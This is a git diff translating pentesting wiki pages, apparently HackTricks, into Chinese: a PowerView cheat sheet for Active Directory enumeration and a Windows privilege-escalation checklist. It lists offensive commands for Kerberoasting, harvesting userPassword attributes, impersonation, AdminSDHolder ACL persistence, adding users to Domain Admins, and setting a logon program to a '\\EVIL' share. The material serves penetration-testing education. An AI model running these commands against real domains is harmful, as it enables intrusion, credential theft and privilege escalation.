)(OA;CI;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CC;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aa5-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;5cb41ed0-0e4c-11d0-a286-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-3842939050-3880317879-2865463114-5181)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;9a7ad945-ca53-11d1-bbd0-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967991-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a0a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;9a9a021e-4a5b-11d1-a9c3-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;0296c120-40da-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;934de926-b09e-11d2-aa06-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5e353847-f36c-48be-a7f7-49685402503c;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;8d3bca50-1d7e-11d0-a081-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;275b2f54-982d-4dcd-b0ad-e53501445efb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5fd42471-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5430e777-c3ea-4024-902e-dde192204669;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;6f606079-3a82-4c1b-8efb-dcc8c91d26fe;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a7a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;614aea82-abc6-4dd0-a148-d67a59c72816;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;66437984-c3c5-498f-b269-987819ef484b;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;2cc06e9d-6f7e-426a-8825-0215de176e11;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;3263e3b8-fd6b-4c60-87f2-34bdaa9d69eb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e0abfd0-126a-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;7cb4c7d3-8787-42b0-b438-3c5d479ad31e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-526)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-527)(OA;CI;DTWD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;DTWD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CCDCLCRPWPLO;f0f8ffac-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;CCDCLCRPWPLO;e8b2aff2-59a7-4eac-9a70-819adef701dd;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aa5-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;5cb41ed0-0e4c-11d0-a286-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;WD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;CO)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;c975c901-6cea-4b6f-8319-d67f45449506;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;f0f8ffac-1191-11d0-a060-00aa006c33ed;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CINPIO;RPWPLOSD;;e8b2aff2-59a7-4eac-9a70-819adef701dd;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;NS)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;AU)(OA;CI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;LCSWRPWPRC;;;S-1-5-21-3842939050-3880317879-2865463114-5213)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5172)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5187)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3842939050-3880317879-2865463114-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;CI;LCRPWPRC;;;AN)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)"
 
 Owner            : BUILTIN\Administrators
 Group            : BUILTIN\Administrators
 DiscretionaryAcl : {Everyone: AccessDenied (WriteData), Everyone: AccessAllowed (WriteExtendedAttributes), NT
-                   AUTHORITY\ANONYMOUS LOGON: AccessAllowed (CreateDirectories, GenericExecute, ReadPermissions,
-                   Traverse, WriteExtendedAttributes), NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS: AccessAllowed
-                   (CreateDirectories, GenericExecute, GenericRead, ReadAttributes, ReadPermissions,
-                   WriteExtendedAttributes)...}
+AUTHORITY\ANONYMOUS LOGON: AccessAllowed (CreateDirectories, GenericExecute, ReadPermissions,
+Traverse, WriteExtendedAttributes), NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS: AccessAllowed
+(CreateDirectories, GenericExecute, GenericRead, ReadAttributes, ReadPermissions,
+WriteExtendedAttributes)...}
 SystemAcl        : {Everyone: SystemAudit SuccessfulAccess (ChangePermissions, TakeOwnership, Traverse),
-                   BUILTIN\Administrators: SystemAudit SuccessfulAccess (WriteAttributes), DOMAIN_NAME\Domain Users:
-                   SystemAudit SuccessfulAccess (WriteAttributes), Everyone: SystemAudit SuccessfulAccess
-                   (Traverse)...}
+BUILTIN\Administrators: SystemAudit SuccessfulAccess (WriteAttributes), DOMAIN_NAME\Domain Users:
+SystemAudit SuccessfulAccess (WriteAttributes), Everyone: SystemAudit SuccessfulAccess
+(Traverse)...}
 RawDescriptor    : System.Security.AccessControl.CommonSecurityDescriptor
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/basic-powershell-for-pentesters/powerview.md b/src/windows-hardening/basic-powershell-for-pentesters/powerview.md
index 0a894a6ed..d18bfa6cf 100644
--- a/src/windows-hardening/basic-powershell-for-pentesters/powerview.md
+++ b/src/windows-hardening/basic-powershell-for-pentesters/powerview.md
@@ -6,12 +6,11 @@
 
 {% embed url="https://websec.nl/" %}
 
-The most up-to-date version of PowerView will always be in the dev branch of PowerSploit: [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
+PowerView的最新版本将始终在PowerSploit的开发分支中：[https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
 
-[**SharpView**](https://github.com/tevora-threat/SharpView) is a .NET port of [**PowerView**](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
-
-### Quick enumeration
+[**SharpView**](https://github.com/tevora-threat/SharpView) 是 [**PowerView**](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) 的.NET移植版
 
+### 快速枚举
 ```powershell
 Get-NetDomain #Basic domain info
 #User info
@@ -42,9 +41,7 @@ Invoke-UserHunter -CheckAccess
 #Find interesting ACLs
 Invoke-ACLScanner -ResolveGUIDs | select IdentityReferenceName, ObjectDN, ActiveDirectoryRights | fl
 ```
-
-### Domain info
-
+### 域信息
 ```powershell
 # Domain Info
 Get-Domain #Get info about the current domain
@@ -67,9 +64,7 @@ Get-NetDomainController -Domain mydomain.local #Get all ifo of specific domain D
 # Get Forest info
 Get-ForestDomain
 ```
-
-### Users, Groups, Computers & OUs
-
+### 用户、组、计算机和组织单位
 ```powershell
 # Users
 ## Get usernames and their groups
@@ -97,7 +92,7 @@ Get-Netuser -TrustedToAuth | select userprincipalname, name, msds-allowedtodeleg
 Get-NetUser -AllowDelegation -AdminCount #All privileged users that aren't marked as sensitive/not for delegation
 # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
 Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
-    ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
+($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
 }
 # Users with PASSWD_NOTREQD set in the userAccountControl means that the user is not subject to the current password policy
 ## Users with this flag might have empty passwords (if allowed) or shorter passwords
@@ -135,9 +130,7 @@ Get-DomainOU "Servers" | %{Get-DomainComputer -SearchBase $_.distinguishedname -
 Get-NetOU #Get Organization Units
 Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case)
 ```
-
-### Logon and Sessions
-
+### 登录和会话
 ```powershell
 Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)
 Get-NetSession -ComputerName <servername> #Get active sessions on the host
@@ -145,12 +138,10 @@ Get-LoggedOnLocal -ComputerName <servername> #Get locally logon users at the mom
 Get-LastLoggedon -ComputerName <servername> #Get last user logged on (needs admin rigths in host)
 Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host)
 ```
+### 组策略对象 - GPOs
 
-### Group Policy Object - GPOs
-
-If an attacker has **high privileges over a GPO** he could be able to **privesc** abusing it by **add permissions to a user**, **add a local admin user** to a host or **create a scheduled task** (immediate) to perform an action.\
-For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation).
-
+如果攻击者对一个 GPO 拥有 **高权限**，他可能能够通过 **为用户添加权限**、**向主机添加本地管理员用户** 或 **创建一个计划任务**（立即）来执行某个操作，从而 **提权**。\
+有关此内容的 [**更多信息以及如何利用它，请点击此链接**](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation)。
 ```powershell
 #GPO
 Get-DomainGPO | select displayName #Check the names for info
@@ -184,15 +175,13 @@ Get-DomainGPOLocalGroup | select GPODisplayName, GroupName, GPOType
 # Enumerates the machines where a specific domain user/group is a member of a specific local group.
 Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName
 ```
-
-Learn how to **exploit permissions over GPOs and ACLs** in:
+学习如何 **利用 GPO 和 ACL 的权限** 在：
 
 {{#ref}}
 ../active-directory-methodology/acl-persistence-abuse/
 {{#endref}}
 
 ### ACL
-
 ```powershell
 #Get ACLs of an object (permissions of other objects over the indicated one)
 Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs
@@ -213,17 +202,13 @@ Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUser
 #Get special rights over All administrators in domain
 Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights
 ```
-
-### Shared files and folders
-
+### 共享文件和文件夹
 ```powershell
 Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers
 Find-DomainShare -CheckShareAccess #Search readable shares
 Find-InterestingDomainShareFile #Find interesting files, can use filters
 ```
-
-### Domain Trust
-
+### 域信任
 ```powershell
 Get-NetDomainTrust #Get all domain trusts (parent, children and external)
 Get-DomainTrust #Same
@@ -240,9 +225,7 @@ Get-NetForestTrust #Get forest trusts (it must be between 2 roots, trust between
 Get-DomainForeingUser #Get users with privileges in other domains inside the forest
 Get-DomainForeignGroupMember #Get groups with privileges in other domains inside the forest
 ```
-
-### L**ow**-**hanging fruit**
-
+### 低垂的果实
 ```powershell
 #Check if any user passwords are set
 $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
@@ -280,40 +263,30 @@ Invoke-UserHunter -GroupName "RDPUsers"
 #It will only search for active users inside high traffic servers (DC, File Servers and Distributed File servers)
 Invoke-UserHunter -Stealth
 ```
-
-### Deleted objects
-
+### 删除的对象
 ```powershell
 #This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
 #You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects
 Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
 ```
-
 ### MISC
 
-#### SID to Name
-
+#### SID 转换为名称
 ```powershell
 "S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName
 ```
-
 #### Kerberoast
-
 ```powershell
 Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users
 ```
-
-#### Use different credentials (argument)
-
+#### 使用不同的凭据（参数）
 ```powershell
 # use an alterate creadential for any function
 $SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
 $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
 Get-DomainUser -Credential $Cred
 ```
-
-#### Impersonate a user
-
+#### 冒充用户
 ```powershell
 # if running in -sta mode, impersonate another credential a la "runas /netonly"
 $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
@@ -322,9 +295,7 @@ Invoke-UserImpersonation -Credential $Cred
 # ... action
 Invoke-RevertToSelf
 ```
-
-#### Set values
-
+#### 设置值
 ```powershell
 # set the specified property for the given user identity
 Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
@@ -335,10 +306,8 @@ Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=lo
 # Add user to 'Domain Admins'
 Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain.local
 ```
-
 <figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/checklist-windows-privilege-escalation.md b/src/windows-hardening/checklist-windows-privilege-escalation.md
index 2280ec460..09c1fef8f 100644
--- a/src/windows-hardening/checklist-windows-privilege-escalation.md
+++ b/src/windows-hardening/checklist-windows-privilege-escalation.md
@@ -1,115 +1,114 @@
-# Checklist - Local Windows Privilege Escalation
+# 检查清单 - 本地 Windows 提权
 
 {{#include ../banners/hacktricks-training.md}}
 
-### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
+### **查找 Windows 本地提权向量的最佳工具：** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
 
-### [System Info](windows-local-privilege-escalation/#system-info)
+### [系统信息](windows-local-privilege-escalation/#system-info)
 
-- [ ] Obtain [**System information**](windows-local-privilege-escalation/#system-info)
-- [ ] Search for **kernel** [**exploits using scripts**](windows-local-privilege-escalation/#version-exploits)
-- [ ] Use **Google to search** for kernel **exploits**
-- [ ] Use **searchsploit to search** for kernel **exploits**
-- [ ] Interesting info in [**env vars**](windows-local-privilege-escalation/#environment)?
-- [ ] Passwords in [**PowerShell history**](windows-local-privilege-escalation/#powershell-history)?
-- [ ] Interesting info in [**Internet settings**](windows-local-privilege-escalation/#internet-settings)?
-- [ ] [**Drives**](windows-local-privilege-escalation/#drives)?
-- [ ] [**WSUS exploit**](windows-local-privilege-escalation/#wsus)?
-- [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/#alwaysinstallelevated)?
+- [ ] 获取 [**系统信息**](windows-local-privilege-escalation/#system-info)
+- [ ] 使用脚本搜索 **内核** [**漏洞**](windows-local-privilege-escalation/#version-exploits)
+- [ ] 使用 **Google 搜索** 内核 **漏洞**
+- [ ] 使用 **searchsploit 搜索** 内核 **漏洞**
+- [ ] [**环境变量**](windows-local-privilege-escalation/#environment) 中有趣的信息？
+- [ ] [**PowerShell 历史**](windows-local-privilege-escalation/#powershell-history) 中的密码？
+- [ ] [**Internet 设置**](windows-local-privilege-escalation/#internet-settings) 中有趣的信息？
+- [ ] [**驱动器**](windows-local-privilege-escalation/#drives)？
+- [ ] [**WSUS 漏洞**](windows-local-privilege-escalation/#wsus)？
+- [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/#alwaysinstallelevated)？
 
-### [Logging/AV enumeration](windows-local-privilege-escalation/#enumeration)
+### [日志/AV 枚举](windows-local-privilege-escalation/#enumeration)
 
-- [ ] Check [**Audit** ](windows-local-privilege-escalation/#audit-settings)and [**WEF** ](windows-local-privilege-escalation/#wef)settings
-- [ ] Check [**LAPS**](windows-local-privilege-escalation/#laps)
-- [ ] Check if [**WDigest** ](windows-local-privilege-escalation/#wdigest)is active
-- [ ] [**LSA Protection**](windows-local-privilege-escalation/#lsa-protection)?
-- [ ] [**Credentials Guard**](windows-local-privilege-escalation/#credentials-guard)[?](windows-local-privilege-escalation/#cached-credentials)
-- [ ] [**Cached Credentials**](windows-local-privilege-escalation/#cached-credentials)?
-- [ ] Check if any [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md)
-- [ ] [**AppLocker Policy**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)?
+- [ ] 检查 [**审计**](windows-local-privilege-escalation/#audit-settings) 和 [**WEF**](windows-local-privilege-escalation/#wef) 设置
+- [ ] 检查 [**LAPS**](windows-local-privilege-escalation/#laps)
+- [ ] 检查 [**WDigest**](windows-local-privilege-escalation/#wdigest) 是否处于活动状态
+- [ ] [**LSA 保护**](windows-local-privilege-escalation/#lsa-protection)？
+- [ ] [**凭据保护**](windows-local-privilege-escalation/#credentials-guard)[?](windows-local-privilege-escalation/#cached-credentials)
+- [ ] [**缓存凭据**](windows-local-privilege-escalation/#cached-credentials)？
+- [ ] 检查是否有任何 [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md)
+- [ ] [**AppLocker 策略**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)？
 - [ ] [**UAC**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control/README.md)
-- [ ] [**User Privileges**](windows-local-privilege-escalation/#users-and-groups)
-- [ ] Check [**current** user **privileges**](windows-local-privilege-escalation/#users-and-groups)
-- [ ] Are you [**member of any privileged group**](windows-local-privilege-escalation/#privileged-groups)?
-- [ ] Check if you have [any of these tokens enabled](windows-local-privilege-escalation/#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
-- [ ] [**Users Sessions**](windows-local-privilege-escalation/#logged-users-sessions)?
-- [ ] Check[ **users homes**](windows-local-privilege-escalation/#home-folders) (access?)
-- [ ] Check [**Password Policy**](windows-local-privilege-escalation/#password-policy)
-- [ ] What is[ **inside the Clipboard**](windows-local-privilege-escalation/#get-the-content-of-the-clipboard)?
+- [ ] [**用户权限**](windows-local-privilege-escalation/#users-and-groups)
+- [ ] 检查 [**当前**] 用户 [**权限**](windows-local-privilege-escalation/#users-and-groups)
+- [ ] 你是 [**任何特权组的成员**](windows-local-privilege-escalation/#privileged-groups)吗？
+- [ ] 检查你是否启用了 [这些令牌](windows-local-privilege-escalation/#token-manipulation)：**SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
